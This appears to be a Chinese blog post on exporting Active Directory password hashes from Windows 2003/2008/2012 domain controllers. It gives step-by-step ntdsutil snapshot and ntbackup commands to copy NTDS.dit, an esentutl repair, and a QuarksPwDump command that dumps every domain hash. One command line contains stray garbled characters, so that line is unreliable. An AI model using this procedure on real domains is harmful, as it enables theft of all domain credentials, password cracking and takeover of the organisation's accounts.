windows 2003 windows 2008 windows 2012 导出域控hash的方法

Posted 2020-10-06 懒惰不懒

quarkspwdump作者介绍的用法：

1. Windows 2008
	Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make
	filesystem snapshots while the operating is running and writing to current backuped files.
	Here is a way to backup NTDS.dit file while a domain controller is running:
	#ntdsutil
	#snapshot
	#activate instance ntds
	#create
	#mount {GUID}
	#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
	#unmount {GUID}
	#quit
	#quit
	If AD server hasn‘t the "AD DS role", you have to use dsdbutil.exe command in the same way.
2. Windows 2003
	On this version, VSS has been implemented but not NTDS-type snapshots.
	But you can use ntbackup tool, here is the procedure:
	- Launch NTBACKUP gui
	- Use backup wizard (advanced)
	- Choose to save system state only and choose output filename
	- Wait some minutes
	- Use restore wizard (advanced)
	- Choise your backup, click next and use advanced button
	- Choose to restore file on another location (c:\tmp\ for example)
	- Choose to overwrite everything and next uncheck all restoration parameters
	- Validate and wait some minutes
	- Open a command shell to "c:\tmp\Active Directory"
	- We need to repair the database with this command
	#esentutl /p ntds.dit
	- Validate warning and wait some minutes
	ntds.dit file can now be used with quarkspwdump.

 

其中

#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
#unmount {GUID}
#quit
#quit

适用于可交互式或直接登录状态。

如果是半交互式的，可以采用如下方法（网上看到的用法）：

ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit
ntdsutil  snapshot  "mount {GUID}"  quit  quit
copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit
ntdsutil  snapshot  "unmount {GUID}"  quit  quit2 v- p5 I2 O  E
ntdsutil  snapshot  "delete {GUID}"  quit  quit

 

最后

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit